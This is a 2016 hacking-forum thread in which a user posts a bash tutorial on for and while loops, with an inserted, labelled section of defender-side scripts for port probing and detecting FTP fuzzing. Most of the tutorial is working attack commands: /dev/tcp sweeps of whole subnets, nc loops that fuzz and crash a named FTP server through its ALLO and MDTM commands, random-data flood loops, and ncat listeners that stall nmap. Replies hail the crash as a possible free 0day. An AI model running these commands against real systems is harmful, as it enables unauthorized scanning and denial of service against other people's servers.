
Author Topic: FAST TRACK "For While Break Computer"  (Read 1760 times)

Offline RedCor

FAST TRACK "For While Break Computer"
« on: March 23, 2016, 10:50:09 AM »
I do not understand anything about computers in general; too much perfection while nothing is perfect, that's my opinion, but good.

I created a tutorial that I hope will help you with the use of for loops and while loops.


FAST TRACK "For While Break Computer"


################################
# SCRIPTING WITH FOR AND WHILE #
################################

################################################################################################
# MACHINE: PC XP (target); PC CRUNCHBANG++ (attacker)
# USED SOFTWARE: Unix/Linux $(for, while, wget, nc (netcat), convert); Windows $(TYPsoft FTP Server, Immunity Debugger or OllyDbg)
# ATTACKER OBJECTIVE: scan ports with for and while, fuzz, and also download with for and create a PDF
################################################################################################

################################################################################################
#Configure XP Machine
In your XP machine or another Windows system, download:
-https://sourceforge.net/projects/ftpserv/
-http://debugger.immunityinc.com/ID_register.py
or
-http://www.ollydbg.de/odbg200.zip




################################################################################################
#Configure Unix/Linux Machine
You must ensure that wget is installed (locate wget or which wget)
You must ensure that convert is installed; if not: sudo apt-get install imagemagick

################################################################################################

#START SCANNING FUZZING AND DOWNLOAD      #

###########################################
###FOR INTRO###

I wrote different commands you can test, but for now I'll disassemble the command.

Test these commands in your terminal:

Code:
for memberstophatsec in {1..10}; <does not work
Code:
for memberstophatsec in {1..10};do echo $memberstophatsec <does not work
Code:
for memberstophatsec in {1..10};do echo $memberstophatsec ;done  <Yeah, you can see the variable memberstophatsec with the echo command.


Code:
for memberstophatsec in user1 user2 user3 ;do echo $memberstophatsec;done
Code:
for memberstophatsec in {user,user}{1..3} age {20..60} ;do echo $memberstophatsec;done <does not work


Code:
for memberstophatsec in {user,user}{1001..1003}age{100..113}happybirthday ;do echo $memberstophatsec;done


###########################################
###FOR SCANNING###

Disassemble the command
We need to scan:

SOCKET:?
IP:?
PORT:?

SOCKET:/dev/tcp/
IP:192.168.0.17/ = $ip
PORT:{21,2121} = $ip


Code:
for ip in yourip/{yourport,yourport};do (echo -e >/dev/tcp/$ip) &>/dev/null && echo -e "\033[31m$ip is OPEN\033[00m" ;done
Practice:

This command scans the IP 192.168.0.11 on ports 21 and 22 to find out if they are open

Code:
for ip in 192.168.0.17/{21,2121};do (echo -e >/dev/tcp/$ip) &>/dev/null && echo -e "\033[31m$ip is OPEN\033[00m" ;done


This command scans the IP 192.168.0.0/24 on ports 22 and 80 to find out if they are open, and shows the open and closed ports

Code:
for ip in 192.168.0.{16..17}/{22,80,21};do echo -e >/dev/tcp/$ip &>/dev/null && echo -e "\033[31m$ip is OPEN\033[00m" ||  echo -e "\033[34m$ip is CLOSED\033[00m";done 


And add " | less " at the end of the command, wait for the scan and use the up arrow to look at the open and closed ports

Code:
for ip in 192.168.0.{16..17}/{22,80,21};do echo -e >/dev/tcp/$ip &>/dev/null && echo -e "\033[31m$ip is OPEN\033[00m" ||  echo -e "\033[34m$ip is CLOSED\033[00m";done | less
This command scans localhost on ports 1 to 1000 to find out if they are open (very fast system call, I like it)
And you can test different commands :)

And add " | less " at the end of the command, wait for the scan and use the up arrow on your keyboard to look at the open and closed ports

Try the command :)

Code:
for i in {1..1000};do echo </dev/tcp/127.0.0.1/$i &>/dev/null && echo -e "\n[+] Open port at:\t$i" ;done
Code:
for i in {1..1000};do echo </dev/tcp/127.0.0.1/$i &>/dev/null && echo -e "\n[+] Open port at:\t$i" ;done | less
Code:
for i in 192.168.0.{1..254}/21;do echo </dev/tcp/$i &>/dev/null && echo -e "\n[+] Open port at:\t$i" ;done
Code:
for i in {1..1000};do (echo </dev/tcp/127.0.0.1/$i) &>/dev/null && echo -e "\n[+] Open port at:\t$i" ;done
Code:
for i in {1..1000};do (echo </dev/tcp/192.168.0.17/$i) &>/dev/null && echo -e "\n[+] Open port at:\t$i" ;done
Code:
for i in {1..1000};do (echo </dev/tcp/127.0.0.1/$i) &>/dev/null && echo -e "\n[+] Open port at:\t$i" || echo -n ".";done
Code:
for i in 192.168.0.{1..254}/{22,80,443};do (echo </dev/tcp/$i) &>/dev/null && echo -e "\n[+] Open port at:\t$i" || echo -n ".";done
Code:
for i in 192.168.0.{1..254}/{21,22,25,80,8080,443};do echo </dev/tcp/$i &>/dev/null && echo -e "\n[+] Open port at:\t$i" ;done  <Very slow but useful in some cases
The last command can be useful in some cases, to have a lot of "....." to see the ports
Code:
for i in {1..1000};do echo </dev/tcp/127.0.0.1/$i && echo -e "\n[+] Open at \n...$i"; done
###########################################
###WHILE FOR FUZZING AND RECON###
Fuzzing ??
Let's go fuzzing
This is not a real bug, but I think .. it will serve me to explain how to crash an application and use the RFC commands.

TARGET=192.168.0.17
ATTACKER=192.168.0.12

Code:
for ip in 192.168.0.17/{21,2121};do (echo -e >/dev/tcp/$ip) &>/dev/null &&  echo -e "\033[31m$ip is OPEN\033[00m" ;done
Have a look at what the server responds

Code:
cat </dev/tcp/192.168.0.17/21


We can fetch the RFC commands, which can be useful in certain cases ...



We can test the commands of an FTP server, for example:

Code:
for i in CWD  XCWD CDUP XCUP SMNT* PORT PASV  EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD XRMD MKD  XMKD PWD  XPWD SIZE SYST HELP  NOOP FEAT OPTS AUTH CCC* CONF*   ENC* MIC*  PBSZ PROT TYPE STRU MODE RETR STOR STOU  APPE REST ABOR USER PASS ACCT*   REIN*   LIST  NLST STAT SITE ;do /bin/echo $i|nc 192.168.0.17 21;done
and Ctrl+C for the next command

Look at the FTP server and restart your FTP server

Nice, on ALLO the FTP server crashes

Look at the FTP server and restart your FTP server


Code:
for i in CWD   ALLO* RNFR RNTO DELE MDTM  ;do /bin/echo $i|nc 192.168.0.17 21;done


MDTM crashes the FTP server; okay, I test it, I press Ctrl+C
Restart your ftp server
Code:
echo MDTM >/dev/tcp/192.168.0.17/21


Good, MDTM crashes the app

#############################################################################################################
###Random FUZZ###Just For fun

So I have created a random fuzzer in one line ..

Code:
while [ 1 ]; do cat /dev/urandom | nc -vv target port; done



It showed that no matter what .. no crash .. but it can be useful sometimes

I want to create pseudo-commands to crash my FTP server or to test it
Example: ALLO = 4 ; RNFR = 4
I create a while loop

I created a while loop that takes random characters from A-Z, builds me a command of 4 capital letters and sends it to my FTP server

Code:
while [ 1 ]; do sleep 5; tr -dc 'A-Z' </dev/urandom | fold -w 4 | nc -vv 192.168.0.17 21; done







The FTP server crashes, but I think it's a bit like a DDoS attack.. or not? write RW ?
I'm not an expert, but it may be interesting to look further, maybe.

#############################################################################################################
###Exotic Command###Just For fun

echo is cool !
Code:
echo {1..100}


with | less





Here is another example

Code:
for i in {1..50};do echo </dev/tcp/127.0.0.1/$i && echo -e "\n[+]Open at \n$i"; done
Code:
for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50;do echo </dev/tcp/127.0.0.1/$i && echo -e "\n[+]Open at \n$i"; done
Code:
for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50;do echo </dev/tcp/127.0.0.1/$i && echo -e "\n[+]Open at \n$i"; done | less
Code:
for i in $(echo {1..100}) ;do echo </dev/tcp/127.0.0.1/$i && echo -e "\n[+]Open at \n$i"; done
Code:
for i in {1..1000};do echo </dev/tcp/127.0.0.1/$i && echo -e "\n[+]Open at \n$i"; done | less
For the last command, use the right and left arrows on your keyboard to view the open ports.

Code:
for i in $(echo {1..100});do echo </dev/tcp/127.0.0.1/$i &>/dev/null && echo -e "\n[+]Open at $i";done | less
------------------------------------
#############################################################################################################
###SlideShareDownloader###
#Objective: download the images from SlideShare and convert them to PDF, because we have no time to register.

Create a folder

mkdir MYIMAGE
cd MYIMAGE



Open Your browser
http://fr.slideshare.net/codeblue_jp/seok-halee-enpub





Search for the value 1 or 2

OK, you have 50 pages




Code:
for i in {1..50};do /usr/bin/wget -O "$(printf '%03d' "$i").jpg" "http://image.slidesharecdn.com/seokhaleeenpub-140312044155-phpapp02/95/various-tricks-for-remote-linux-exploits-by-seokha-lee-wh1ant-$i-638.jpg?cb=1394624165"; done




And convert your images into a PDF

You must ensure that convert is installed if not (sudo apt-get install imagemagick) ;)



Code:
convert * +compress various-tricks-for-remote-linux-exploits-by-seokha-lee-wh1ant.pdf




You have a nice pdf :)

Exercise for next time:

Code:
for i in {1..109};do /usr/bin/wget -O "$(printf '%03d' "$i").jpg" "http://image.slidesharecdn.com/xxnen-151215110405/95/xxssnightmare-1-modeattack-xss-attacks-exploiting-xss-filter-$i-638.jpg?cb=1450272053";done

Cheat sheet
browser + for command + wget and convert, and you have your PDF
(if you have a curl command to retrieve the value, I don't mind :) )

#############################################################################################################
###CRASH NMAP###
Bye bye nmap the light in the sea !!

Start as root:
Code:
ncat -lkv -p 21 --sh-exec "echo 'HTTP/1.1 200 OK\r\n'; cat /dev/urandom"
##
# Scan with nmap
Code:
nmap -sS -v -P0 -A 127.0.0.1
It's slow but you don't get a crash :)

#Scan with your simple syscall scanner
Code:
for i in {1..30};do echo </dev/tcp/127.0.0.1/$i && echo -e "\n[+]Open at \t$i"; done | less
It's fast, you have the ports !!!

###
#Exotic command for crash nmap

Step 1: post uppercase letters
Code:
ncat -lkv -p 8080 --sh-exec "echo 'HTTP/1.1 200 OK\r\n'; cat /dev/urandom | tr -dc 'A-Z' "
I run nc 127.0.0.1 8080. Nmap doesn't like letters, hmm, nmap is slow



Step 2: 4-letter words
Code:
ncat -lkv -p 8080 --sh-exec "echo 'HTTP/1.1 200 OK\r\n'; cat /dev/urandom | tr -dc 'A-Z'| fold -w 4"
I run nc 127.0.0.1 8080; nmap is very slow



Step 3 the lethal dose
Code:
ncat -lkv -p 8080 --sh-exec "echo 'HTTP/1.1 200 OK\r\n'; cat /dev/urandom | tr -dc 'A-Z'| fold -w 1000 "
Nmap is very, very slow :)

High CPU :)


End.

KRAM KOMPUTER !!!

This is not necessarily technical, but useful, and good if it helps

Thanks for reading
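The following is an added example, not code from RedCor's post. It packages the /dev/tcp probe used throughout the tutorial as small shell functions for checking your own hosts, and adds the two things the one-liners leave out: a connect timeout (a filtered port that never answers would otherwise stall the loop for minutes) and proper suppression of bash's own "Connection refused" message. In the tutorial's bare form, echo >/dev/tcp/$ip &>/dev/null, that message still reaches the terminal because bash sets up redirections left to right, so the failing /dev/tcp redirect is reported before &>/dev/null is applied; the subshell form ( ... ) &>/dev/null and the child-process form used here both avoid it. The function names (spec_host, spec_port, probe_port, port_state, scan_specs, count_open) and the "HOST/PORT" spec form are this example's own, and it assumes bash and coreutils timeout are installed.

```shell
#!/bin/bash
# Added example, not code from the original post. Assumes bash and coreutils `timeout`.

# Split the tutorial's "HOST/PORT" form (e.g. 192.168.0.17/21) into host and port.
spec_host() { printf '%s\n' "${1%/*}"; }
spec_port() { printf '%s\n' "${1##*/}"; }

# probe_port HOST PORT [TIMEOUT]
# Exit status 0 when HOST:PORT accepts a TCP connection, 1 otherwise.
# The connect runs in a child bash under `timeout`, so a port that never
# answers gives up after TIMEOUT seconds (default 2) instead of hanging the
# loop, and the child's "Connection refused" message is discarded here
# rather than leaking into the output.
probe_port() {
    timeout "${3:-2}" bash -c 'exec 3<>"/dev/tcp/$0/$1"' "$1" "$2" >/dev/null 2>&1 || return 1
    return 0
}

# port_state HOST PORT -> prints "open" or "closed"
port_state() {
    if probe_port "$1" "$2"; then printf 'open\n'; else printf 'closed\n'; fi
}

# scan_specs SPEC... -> one line per spec, e.g. "192.168.0.17/21 open"
scan_specs() {
    for spec in "$@"; do
        printf '%s %s\n' "$spec" "$(port_state "$(spec_host "$spec")" "$(spec_port "$spec")")"
    done
}

# count_open SPEC... -> how many of the given specs are open (prints 0 when none are)
count_open() {
    scan_specs "$@" | grep -c ' open$' || true
}

# Usage when saved as a script:  ./probe.sh 192.168.0.17/21 192.168.0.17/2121
if [ $# -gt 0 ]; then
    scan_specs "$@"
fi
```

Because each probe is its own child process, a closed port still returns immediately (connection refused) while a silently dropped one costs at most the timeout; lowering the default of 2 seconds speeds up sweeps of many ports at the price of missing slow hosts.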

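From the defender's side, the fuzz loops above (random 4-letter verbs, ALLO* with a glob, repeated MDTM) leave a clear trace on the server: a burst of verbs the server does not know and a run of 5xx replies (RFC 959 uses 500 "command unrecognized", 501 "syntax error in parameters", 502 "not implemented") from a single client. The added example below, which is not part of the original post, runs that detection with awk and sort over a command log. The log layout, one line per command as "DATE TIME CLIENT VERB REPLY-CODE", and every sample line in it are constructed for this example, so adapt the field numbers ($3, $4, $5) to your FTP server's real log format; the function names are this example's own.

```shell
#!/bin/sh
# Added example, not from the original post. Detection of fuzzing-style FTP
# traffic over a constructed command log; only awk and sort are needed.

# Constructed sample log: "DATE TIME CLIENT VERB REPLY-CODE", one line per command.
# 192.168.0.5 is a normal session, 192.168.0.12 behaves like the tutorial's fuzz loops.
sample_log() {
    cat <<'EOF'
2016-03-23 10:50:01 192.168.0.5 USER 331
2016-03-23 10:50:02 192.168.0.5 PASS 230
2016-03-23 10:50:03 192.168.0.5 PWD 257
2016-03-23 10:50:04 192.168.0.5 LIST 226
2016-03-23 10:50:10 192.168.0.12 QZXW 500
2016-03-23 10:50:15 192.168.0.12 MKPL 500
2016-03-23 10:50:20 192.168.0.12 ALLO* 501
2016-03-23 10:50:25 192.168.0.12 RRTY 500
2016-03-23 10:50:30 192.168.0.12 XJKQ 500
2016-03-23 10:50:35 192.168.0.12 MDTM 501
2016-03-23 10:51:00 192.168.0.9 NOOP 200
2016-03-23 10:51:01 192.168.0.9 BLAH 500
EOF
}

# The verbs the tutorial's loop sends (RFC 959 plus the usual extensions); anything else is suspect.
KNOWN_VERBS="USER PASS ACCT CWD XCWD CDUP XCUP SMNT REIN QUIT PORT PASV EPRT EPSV TYPE STRU MODE RETR STOR STOU APPE ALLO REST RNFR RNTO ABOR DELE RMD XRMD MKD XMKD PWD XPWD LIST NLST SITE SYST STAT HELP NOOP FEAT OPTS AUTH CCC CONF ENC MIC PBSZ PROT MDTM SIZE"

# rejected_per_client < LOG -> "CLIENT COUNT" for every client that received 5xx replies
rejected_per_client() {
    awk '$5 ~ /^5/ { n[$3]++ } END { for (c in n) print c, n[c] }' | sort
}

# flag_fuzzers THRESHOLD < LOG -> clients with at least THRESHOLD rejected commands
flag_fuzzers() {
    rejected_per_client | awk -v t="$1" '$2 + 0 >= t + 0 { print $1 }'
}

# unknown_verbs < LOG -> "CLIENT VERB" for every verb that is not in KNOWN_VERBS
unknown_verbs() {
    awk -v known="$KNOWN_VERBS" '
        BEGIN { n = split(known, a, " "); for (i = 1; i <= n; i++) k[a[i]] = 1 }
        !($4 in k) { print $3, $4 }'
}

# Usage:  sample_log | flag_fuzzers 3      or, on a real file:  flag_fuzzers 3 < ftp.log
```

On the sample data, flag_fuzzers 3 names only 192.168.0.12 (six rejected commands), while 192.168.0.9's single typo stays below the threshold; unknown_verbs lists ALLO* as unknown because the glob star makes it a different token from ALLO, which is exactly the kind of malformed verb the tutorial's loop produces.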

Offline ch3rn0byl

Re: FAST TRACK "For While Break Computer"
« Reply #1 on: March 23, 2016, 01:56:54 PM »
*ears perk*
Did I just see...a crash??? <3
The quieter you become, the more you are unlikely to sound stupid.

Offline RedCor

Re: FAST TRACK "For While Break Computer"
« Reply #2 on: March 23, 2016, 03:07:02 PM »
Yes, it's the crash I wrote about in the FTP server; free 0day maybe?..

« Last Edit: March 23, 2016, 03:08:35 PM by RedCor »